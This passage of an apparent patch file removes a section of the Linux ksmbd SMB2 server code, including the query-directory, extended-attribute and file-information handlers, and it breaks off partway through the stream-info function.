+-		fibdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-
+-		posix_info = (struct smb2_posix_info *)d_info->wptr;
+-		memcpy(posix_info->name, d_info->name, d_info->name_len);
+-		posix_info->name[d_info->name_len] = 0x00;
+-		posix_info->name_len = cpu_to_le32(d_info->name_len);
+-		posix_info->NextEntryOffset =
+-			cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	} /* switch (info_level) */
+-
+-	d_info->num_entry++;
+-	d_info->out_buf_len -= next_entry_offset;
+-	d_info->wptr += next_entry_offset;
+-	return 0;
+-}
+-
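+-/*
+- * dir_context actor for smb2_query_dir(): skip dot/dotdot, vetoed and
+- * non-matching names, and reserve a response entry for everything else.
+- * Returning false stops the iteration.
+- */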
+-static bool __query_dir(struct dir_context *ctx, const char *name, int namlen,
+-		       loff_t offset, u64 ino, unsigned int d_type)
+-{
+-	struct ksmbd_readdir_data	*buf;
+-	struct smb2_query_dir_private	*priv;
+-	struct ksmbd_dir_info		*d_info;
+-	int				rc;
+-
+-	buf	= container_of(ctx, struct ksmbd_readdir_data, ctx);
+-	priv	= buf->private;
+-	d_info	= priv->d_info;
+-
+-	/* dot and dotdot entries are already reserved */
+-	if (!strcmp(".", name) || !strcmp("..", name))
+-		return true;
+-	if (ksmbd_share_veto_filename(priv->work->tcon->share_conf, name))
+-		return true;
+-	if (!match_pattern(name, namlen, priv->search_pattern))
+-		return true;
+-
+-	d_info->name		= name;
+-	d_info->name_len	= namlen;
+-	rc = reserve_populate_dentry(d_info, priv->info_level);
+-	if (rc)
+-		return false;
+-	if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY)
+-		d_info->out_buf_len = 0;
+-	return true;
+-}
+-
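+-/* check that the client requested a supported info level */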
+-static int verify_info_level(int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	case FILE_DIRECTORY_INFORMATION:
+-	case FILE_NAMES_INFORMATION:
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return 0;
+-}
+-
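+-/* free space left in the response buffer, less hdr2_len */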
+-static int smb2_resp_buf_len(struct ksmbd_work *work, unsigned short hdr2_len)
+-{
+-	int free_len;
+-
+-	free_len = (int)(work->response_sz -
+-		(get_rfc1002_len(work->response_buf) + 4)) - hdr2_len;
+-	return free_len;
+-}
+-
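+-/*
+- * Clamp the client-requested output length to both the connection's
+- * maximum transaction size and the free space left in the response
+- * buffer.
+- */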
+-static int smb2_calc_max_out_buf_len(struct ksmbd_work *work,
+-				     unsigned short hdr2_len,
+-				     unsigned int out_buf_len)
+-{
+-	int free_len;
+-
+-	if (out_buf_len > work->conn->vals->max_trans_size)
+-		return -EINVAL;
+-
+-	free_len = smb2_resp_buf_len(work, hdr2_len);
+-	if (free_len < 0)
+-		return -EINVAL;
+-
+-	return min_t(int, out_buf_len, free_len);
+-}
+-
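+-/**
+- * smb2_query_dir() - handler for smb2 query directory command
+- * @work:	smb work containing query directory command buffer
+- *
+- * Return:	0 (errors are reported through the response status)
+- */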
+-int smb2_query_dir(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_query_directory_req *req;
+-	struct smb2_query_directory_rsp *rsp;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	struct ksmbd_file *dir_fp = NULL;
+-	struct ksmbd_dir_info d_info;
+-	int rc = 0;
+-	char *srch_ptr = NULL;
+-	unsigned char srch_flag;
+-	int buffer_sz;
+-	struct smb2_query_dir_private query_dir_private = {NULL, };
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (ksmbd_override_fsids(work)) {
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		smb2_set_err_rsp(work);
+-		return -ENOMEM;
+-	}
+-
+-	rc = verify_info_level(req->FileInformationClass);
+-	if (rc) {
+-		rc = -EFAULT;
+-		goto err_out2;
+-	}
+-
+-	dir_fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!dir_fp) {
+-		rc = -EBADF;
+-		goto err_out2;
+-	}
+-
+-	if (!(dir_fp->daccess & FILE_LIST_DIRECTORY_LE) ||
+-	    inode_permission(file_mnt_user_ns(dir_fp->filp),
+-			     file_inode(dir_fp->filp),
+-			     MAY_READ | MAY_EXEC)) {
+-		pr_err("no right to enumerate directory (%pD)\n", dir_fp->filp);
+-		rc = -EACCES;
+-		goto err_out2;
+-	}
+-
+-	if (!S_ISDIR(file_inode(dir_fp->filp)->i_mode)) {
+-		pr_err("can't do query dir for a file\n");
+-		rc = -EINVAL;
+-		goto err_out2;
+-	}
+-
+-	srch_flag = req->Flags;
+-	srch_ptr = smb_strndup_from_utf16(req->Buffer,
+-					  le16_to_cpu(req->FileNameLength), 1,
+-					  conn->local_nls);
+-	if (IS_ERR(srch_ptr)) {
+-		ksmbd_debug(SMB, "Search Pattern not found\n");
+-		rc = -EINVAL;
+-		goto err_out2;
+-	} else {
+-		ksmbd_debug(SMB, "Search pattern is %s\n", srch_ptr);
+-	}
+-
+-	if (srch_flag & SMB2_REOPEN || srch_flag & SMB2_RESTART_SCANS) {
+-		ksmbd_debug(SMB, "Restart directory scan\n");
+-		generic_file_llseek(dir_fp->filp, 0, SEEK_SET);
+-	}
+-
+-	memset(&d_info, 0, sizeof(struct ksmbd_dir_info));
+-	d_info.wptr = (char *)rsp->Buffer;
+-	d_info.rptr = (char *)rsp->Buffer;
+-	d_info.out_buf_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (d_info.out_buf_len < 0) {
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-	d_info.flags = srch_flag;
+-
+-	/*
+-	 * Reserve the dot and dotdot entries at the head of the buffer
+-	 * in the first response.
+-	 */
+-	rc = ksmbd_populate_dot_dotdot_entries(work, req->FileInformationClass,
+-					       dir_fp, &d_info, srch_ptr,
+-					       smb2_populate_readdir_entry);
+-	if (rc == -ENOSPC)
+-		rc = 0;
+-	else if (rc)
+-		goto err_out;
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_HIDE_DOT_FILES))
+-		d_info.hide_dot_file = true;
+-
+-	buffer_sz				= d_info.out_buf_len;
+-	d_info.rptr				= d_info.wptr;
+-	query_dir_private.work			= work;
+-	query_dir_private.search_pattern	= srch_ptr;
+-	query_dir_private.dir_fp		= dir_fp;
+-	query_dir_private.d_info		= &d_info;
+-	query_dir_private.info_level		= req->FileInformationClass;
+-	dir_fp->readdir_data.private		= &query_dir_private;
+-	set_ctx_actor(&dir_fp->readdir_data.ctx, __query_dir);
+-
+-	rc = iterate_dir(dir_fp->filp, &dir_fp->readdir_data.ctx);
+-	/*
+-	 * req->OutputBufferLength is too small to contain even one entry.
+-	 * In this case, immediately return OutputBufferLength 0 to the client.
+-	 */
+-	if (!d_info.out_buf_len && !d_info.num_entry)
+-		goto no_buf_len;
+-	if (rc > 0 || rc == -ENOSPC)
+-		rc = 0;
+-	else if (rc)
+-		goto err_out;
+-
+-	d_info.wptr = d_info.rptr;
+-	d_info.out_buf_len = buffer_sz;
+-	rc = process_query_dir_entries(&query_dir_private);
+-	if (rc)
+-		goto err_out;
+-
+-	if (!d_info.data_count && d_info.out_buf_len >= 0) {
+-		if (srch_flag & SMB2_RETURN_SINGLE_ENTRY && !is_asterisk(srch_ptr)) {
+-			rsp->hdr.Status = STATUS_NO_SUCH_FILE;
+-		} else {
+-			dir_fp->dot_dotdot[0] = dir_fp->dot_dotdot[1] = 0;
+-			rsp->hdr.Status = STATUS_NO_MORE_FILES;
+-		}
+-		rsp->StructureSize = cpu_to_le16(9);
+-		rsp->OutputBufferOffset = cpu_to_le16(0);
+-		rsp->OutputBufferLength = cpu_to_le32(0);
+-		rsp->Buffer[0] = 0;
+-		inc_rfc1001_len(work->response_buf, 9);
+-	} else {
+-no_buf_len:
+-		((struct file_directory_info *)
+-		((char *)rsp->Buffer + d_info.last_entry_offset))
+-		->NextEntryOffset = 0;
+-		if (d_info.data_count >= d_info.last_entry_off_align)
+-			d_info.data_count -= d_info.last_entry_off_align;
+-
+-		rsp->StructureSize = cpu_to_le16(9);
+-		rsp->OutputBufferOffset = cpu_to_le16(72);
+-		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
+-		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
+-	}
+-
+-	kfree(srch_ptr);
+-	ksmbd_fd_put(work, dir_fp);
+-	ksmbd_revert_fsids(work);
+-	return 0;
+-
+-err_out:
+-	pr_err("error while processing smb2 query dir rc = %d\n", rc);
+-	kfree(srch_ptr);
+-
+-err_out2:
+-	if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_NO_SUCH_FILE;
+-	else if (rc == -EBADF)
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-	else if (rc == -ENOMEM)
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-	else if (rc == -EFAULT)
+-		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-	else if (rc == -EIO)
+-		rsp->hdr.Status = STATUS_FILE_CORRUPT_ERROR;
+-	if (!rsp->hdr.Status)
+-		rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, dir_fp);
+-	ksmbd_revert_fsids(work);
+-	return 0;
+-}
+-
+-/**
+- * buffer_check_err() - helper function to check buffer errors
+- * @reqOutputBufferLength:	max buffer length expected in command response
+- * @rsp:		query info response buffer containing the output buffer length
+- * @rsp_org:		base response buffer pointer in case of chained response
+- * @infoclass_size:	query info class response buffer size
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int buffer_check_err(int reqOutputBufferLength,
+-			    struct smb2_query_info_rsp *rsp,
+-			    void *rsp_org, int infoclass_size)
+-{
+-	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
+-		if (reqOutputBufferLength < infoclass_size) {
+-			pr_err("Invalid Buffer Size Requested\n");
+-			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
+-			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
+-			return -EINVAL;
+-		}
+-
+-		ksmbd_debug(SMB, "Buffer Overflow\n");
+-		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
+-				reqOutputBufferLength);
+-		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
+-	}
+-	return 0;
+-}
+-
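+-/*
+- * Pipes have no backing inode, so standard/internal info queries are
+- * answered with fixed values.
+- */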
+-static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
+-				   void *rsp_org)
+-{
+-	struct smb2_file_standard_info *sinfo;
+-
+-	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+-
+-	sinfo->AllocationSize = cpu_to_le64(4096);
+-	sinfo->EndOfFile = cpu_to_le64(0);
+-	sinfo->NumberOfLinks = cpu_to_le32(1);
+-	sinfo->DeletePending = 1;
+-	sinfo->Directory = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
+-}
+-
+-static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+-				   void *rsp_org)
+-{
+-	struct smb2_file_internal_info *file_info;
+-
+-	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
+-
+-	/* any unique number */
+-	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+-}
+-
+-static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+-				   struct smb2_query_info_req *req,
+-				   struct smb2_query_info_rsp *rsp,
+-				   void *rsp_org)
+-{
+-	u64 id;
+-	int rc;
+-
+-	/*
+-	 * Windows can sometimes send a query file info request on a
+-	 * pipe without opening it; check for that error condition here.
+-	 */
+-	id = req->VolatileFileId;
+-	if (!ksmbd_session_rpc_method(sess, id))
+-		return -ENOENT;
+-
+-	ksmbd_debug(SMB, "FileInfoClass %u, FileId 0x%llx\n",
+-		    req->FileInfoClass, req->VolatileFileId);
+-
+-	switch (req->FileInfoClass) {
+-	case FILE_STANDARD_INFORMATION:
+-		get_standard_info_pipe(rsp, rsp_org);
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_STANDARD_INFORMATION_SIZE);
+-		break;
+-	case FILE_INTERNAL_INFORMATION:
+-		get_internal_info_pipe(rsp, id, rsp_org);
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_INTERNAL_INFORMATION_SIZE);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
+-			    req->FileInfoClass);
+-		rc = -EOPNOTSUPP;
+-	}
+-	return rc;
+-}
+-
+-/**
+- * smb2_get_ea() - handler for smb2 get extended attribute command
+- * @work:	smb work containing query info command buffer
+- * @fp:		ksmbd_file pointer
+- * @req:	get extended attribute request
+- * @rsp:	response buffer pointer
+- * @rsp_org:	base response buffer pointer in case of chained response
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		       struct smb2_query_info_req *req,
+-		       struct smb2_query_info_rsp *rsp, void *rsp_org)
+-{
+-	struct smb2_ea_info *eainfo, *prev_eainfo;
+-	char *name, *ptr, *xattr_list = NULL, *buf;
+-	int rc, name_len, value_len, xattr_list_len, idx;
+-	ssize_t buf_free_len, alignment_bytes, next_offset, rsp_data_cnt = 0;
+-	struct smb2_ea_info_req *ea_req = NULL;
+-	const struct path *path;
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-
+-	if (!(fp->daccess & FILE_READ_EA_LE)) {
+-		pr_err("Not permitted to read ext attr : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	path = &fp->filp->f_path;
+-	/* a single EA entry is requested with the given user.* name */
+-	if (req->InputBufferLength) {
+-		if (le32_to_cpu(req->InputBufferLength) <
+-		    sizeof(struct smb2_ea_info_req))
+-			return -EINVAL;
+-
+-		ea_req = (struct smb2_ea_info_req *)req->Buffer;
+-	} else {
+-		/* need to send all EAs if no specific EA is requested */
+-		if (le32_to_cpu(req->Flags) & SL_RETURN_SINGLE_ENTRY)
+-			ksmbd_debug(SMB,
+-				    "All EAs are requested but need to send single EA entry in rsp flags 0x%x\n",
+-				    le32_to_cpu(req->Flags));
+-	}
+-
+-	buf_free_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (buf_free_len < 0)
+-		return -EINVAL;
+-
+-	rc = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (rc < 0) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		goto out;
+-	} else if (!rc) { /* there is no EA in the file */
+-		ksmbd_debug(SMB, "no ea data in the file\n");
+-		goto done;
+-	}
+-	xattr_list_len = rc;
+-
+-	ptr = (char *)rsp->Buffer;
+-	eainfo = (struct smb2_ea_info *)ptr;
+-	prev_eainfo = eainfo;
+-	idx = 0;
+-
+-	while (idx < xattr_list_len) {
+-		name = xattr_list + idx;
+-		name_len = strlen(name);
+-
+-		ksmbd_debug(SMB, "%s, len %d\n", name, name_len);
+-		idx += name_len + 1;
+-
+-		/*
+-		 * CIFS does not support EAs outside the user.* namespace;
+-		 * still, keep the framework generic so other attrs can be
+-		 * listed in the future.
+-		 */
+-		if (strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			continue;
+-
+-		if (!strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+-			     STREAM_PREFIX_LEN))
+-			continue;
+-
+-		if (req->InputBufferLength &&
+-		    strncmp(&name[XATTR_USER_PREFIX_LEN], ea_req->name,
+-			    ea_req->EaNameLength))
+-			continue;
+-
+-		if (!strncmp(&name[XATTR_USER_PREFIX_LEN],
+-			     DOS_ATTRIBUTE_PREFIX, DOS_ATTRIBUTE_PREFIX_LEN))
+-			continue;
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			name_len -= XATTR_USER_PREFIX_LEN;
+-
+-		ptr = (char *)(&eainfo->name + name_len + 1);
+-		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
+-				name_len + 1);
+-		/* bail out if the xattr can't fit in buf_free_len */
+-		value_len = ksmbd_vfs_getxattr(user_ns, path->dentry,
+-					       name, &buf);
+-		if (value_len <= 0) {
+-			rc = -ENOENT;
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-			goto out;
+-		}
+-
+-		buf_free_len -= value_len;
+-		if (buf_free_len < 0) {
+-			kfree(buf);
+-			break;
+-		}
+-
+-		memcpy(ptr, buf, value_len);
+-		kfree(buf);
+-
+-		ptr += value_len;
+-		eainfo->Flags = 0;
+-		eainfo->EaNameLength = name_len;
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			memcpy(eainfo->name, &name[XATTR_USER_PREFIX_LEN],
+-			       name_len);
+-		else
+-			memcpy(eainfo->name, name, name_len);
+-
+-		eainfo->name[name_len] = '\0';
+-		eainfo->EaValueLength = cpu_to_le16(value_len);
+-		next_offset = offsetof(struct smb2_ea_info, name) +
+-			name_len + 1 + value_len;
+-
+-		/* align next xattr entry at a 4 byte boundary */
+-		alignment_bytes = ((next_offset + 3) & ~3) - next_offset;
+-		if (alignment_bytes) {
+-			memset(ptr, '\0', alignment_bytes);
+-			ptr += alignment_bytes;
+-			next_offset += alignment_bytes;
+-			buf_free_len -= alignment_bytes;
+-		}
+-		eainfo->NextEntryOffset = cpu_to_le32(next_offset);
+-		prev_eainfo = eainfo;
+-		eainfo = (struct smb2_ea_info *)ptr;
+-		rsp_data_cnt += next_offset;
+-
+-		if (req->InputBufferLength) {
+-			ksmbd_debug(SMB, "single entry requested\n");
+-			break;
+-		}
+-	}
+-
+-	/* no more ea entries */
+-	prev_eainfo->NextEntryOffset = 0;
+-done:
+-	rc = 0;
+-	if (rsp_data_cnt == 0)
+-		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
+-	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
+-	inc_rfc1001_len(rsp_org, rsp_data_cnt);
+-out:
+-	kvfree(xattr_list);
+-	return rc;
+-}
+-
+-static void get_file_access_info(struct smb2_query_info_rsp *rsp,
+-				 struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_access_info *file_info;
+-
+-	file_info = (struct smb2_file_access_info *)rsp->Buffer;
+-	file_info->AccessFlags = fp->daccess;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_access_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
+-}
+-
+-static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+-			       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_basic_info *basic_info;
+-	struct kstat stat;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	basic_info = (struct smb2_file_basic_info *)rsp->Buffer;
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	basic_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	basic_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	basic_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	basic_info->ChangeTime = cpu_to_le64(time);
+-	basic_info->Attributes = fp->f_ci->m_fattr;
+-	basic_info->Pad1 = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_basic_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
+-	return 0;
+-}
+-
+-static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_standard_info *sinfo;
+-	unsigned int delete_pending;
+-	struct inode *inode;
+-	struct kstat stat;
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+-	delete_pending = ksmbd_inode_pending_delete(fp);
+-
+-	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+-	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
+-	sinfo->DeletePending = delete_pending;
+-	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_standard_info));
+-}
+-
+-static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+-				    void *rsp_org)
+-{
+-	struct smb2_file_alignment_info *file_info;
+-
+-	file_info = (struct smb2_file_alignment_info *)rsp->Buffer;
+-	file_info->AlignmentRequirement = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_alignment_info));
+-}
+-
+-static int get_file_all_info(struct ksmbd_work *work,
+-			     struct smb2_query_info_rsp *rsp,
+-			     struct ksmbd_file *fp,
+-			     void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_all_info *file_info;
+-	unsigned int delete_pending;
+-	struct inode *inode;
+-	struct kstat stat;
+-	int conv_len;
+-	char *filename;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		ksmbd_debug(SMB, "no right to read the attributes : 0x%x\n",
+-			    fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	filename = convert_to_nt_pathname(work->tcon->share_conf, &fp->filp->f_path);
+-	if (IS_ERR(filename))
+-		return PTR_ERR(filename);
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	ksmbd_debug(SMB, "filename = %s\n", filename);
+-	delete_pending = ksmbd_inode_pending_delete(fp);
+-	file_info = (struct smb2_file_all_info *)rsp->Buffer;
+-
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->Attributes = fp->f_ci->m_fattr;
+-	file_info->Pad1 = 0;
+-	file_info->AllocationSize =
+-		cpu_to_le64(inode->i_blocks << 9);
+-	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	file_info->NumberOfLinks =
+-			cpu_to_le32(get_nlink(&stat) - delete_pending);
+-	file_info->DeletePending = delete_pending;
+-	file_info->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+-	file_info->Pad2 = 0;
+-	file_info->IndexNumber = cpu_to_le64(stat.ino);
+-	file_info->EASize = 0;
+-	file_info->AccessFlags = fp->daccess;
+-	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+-	file_info->Mode = fp->coption;
+-	file_info->AlignmentRequirement = 0;
+-	conv_len = smbConvertToUTF16((__le16 *)file_info->FileName, filename,
+-				     PATH_MAX, conn->local_nls, 0);
+-	conv_len *= 2;
+-	file_info->FileNameLength = cpu_to_le32(conv_len);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
+-	kfree(filename);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+-	return 0;
+-}
+-
+-static void get_file_alternate_info(struct ksmbd_work *work,
+-				    struct smb2_query_info_rsp *rsp,
+-				    struct ksmbd_file *fp,
+-				    void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_alt_name_info *file_info;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int conv_len;
+-
+-	spin_lock(&dentry->d_lock);
+-	file_info = (struct smb2_file_alt_name_info *)rsp->Buffer;
+-	conv_len = ksmbd_extract_shortname(conn,
+-					   dentry->d_name.name,
+-					   file_info->FileName);
+-	spin_unlock(&dentry->d_lock);
+-	file_info->FileNameLength = cpu_to_le32(conv_len);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+-}
+-
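+-/*
+- * List the user.DosStream.* xattrs as named streams and, for regular
+- * files, always append the default ::$DATA stream.
+- */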
+-static void get_file_stream_info(struct ksmbd_work *work,
+-				 struct smb2_query_info_rsp *rsp,
+-				 struct ksmbd_file *fp,
+-				 void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_stream_info *file_info;
+-	char *stream_name, *xattr_list = NULL, *stream_buf;
+-	struct kstat stat;
+-	const struct path *path = &fp->filp->f_path;
+-	ssize_t xattr_list_len;
+-	int nbytes = 0, streamlen, stream_name_len, next, idx = 0;
+-	int buf_free_len;
+-	struct smb2_query_info_req *req = ksmbd_req_buf_next(work);
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	file_info = (struct smb2_file_stream_info *)rsp->Buffer;
+-
+-	buf_free_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (buf_free_len < 0)
+-		goto out;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	while (idx < xattr_list_len) {
+-		stream_name = xattr_list + idx;
+-		streamlen = strlen(stream_name);
+-		idx += streamlen + 1;
+-
+-		ksmbd_debug(SMB, "%s, len %d\n", stream_name, streamlen);
+-
+-		if (strncmp(&stream_name[XATTR_USER_PREFIX_LEN],
+-			    STREAM_PREFIX, STREAM_PREFIX_LEN))
+-			continue;
+-
+-		stream_name_len = streamlen - (XATTR_USER_PREFIX_LEN +
+-				STREAM_PREFIX_LEN);
+-		streamlen = stream_name_len;
+-
+-		/* plus one byte for the leading ':' */
+-		streamlen += 1;
+-		stream_buf = kmalloc(streamlen + 1, GFP_KERNEL);
+-		if (!stream_buf)
+-			break;
+-
+-		streamlen = snprintf(stream_buf, streamlen + 1,
+-				     ":%s", &stream_name[XATTR_NAME_STREAM_LEN]);
+-
+-		next = sizeof(struct smb2_file_stream_info) + streamlen * 2;
+-		if (next > buf_free_len) {
+-			kfree(stream_buf);
+-			break;
+-		}
+-
+-		file_info = (struct smb2_file_stream_info *)&rsp->Buffer[nbytes];
+-		streamlen  = smbConvertToUTF16((__le16 *)file_info->StreamName,
+-					       stream_buf, streamlen,
+-					       conn->local_nls, 0);
+-		streamlen *= 2;
+-		kfree(stream_buf);
+-		file_info->StreamNameLength = cpu_to_le32(streamlen);
+-		file_info->StreamSize = cpu_to_le64(stream_name_len);
+-		file_info->StreamAllocationSize = cpu_to_le64(stream_name_len);
+-
+-		nbytes += next;
+-		buf_free_len -= next;
+-		file_info->NextEntryOffset = cpu_to_le32(next);
+-	}
+-
+-out:
+-	if (!S_ISDIR(stat.mode) &&
+-	    buf_free_len >= sizeof(struct smb2_file_stream_info) + 7 * 2) {
+-		file_info = (struct smb2_file_stream_info *)
+-			&rsp->Buffer[nbytes];
+-		streamlen = smbConvertToUTF16((__le16 *)file_info->StreamName,
+-					      "::$DATA", 7, conn->local_nls, 0);
+-		streamlen *= 2;
+-		file_info->StreamNameLength = cpu_to_le32(streamlen);
+-		file_info->StreamSize = cpu_to_le64(stat.size);
+-		file_info->StreamAllocationSize = cpu_to_le64(stat.blocks << 9);
+-		nbytes += sizeof(struct smb2_file_stream_info) + streamlen;
+-	}
+-
+-	/* last entry offset should be 0 */
+-	file_info->NextEntryOffset = 0;
+-	kvfree(xattr_list);
+-
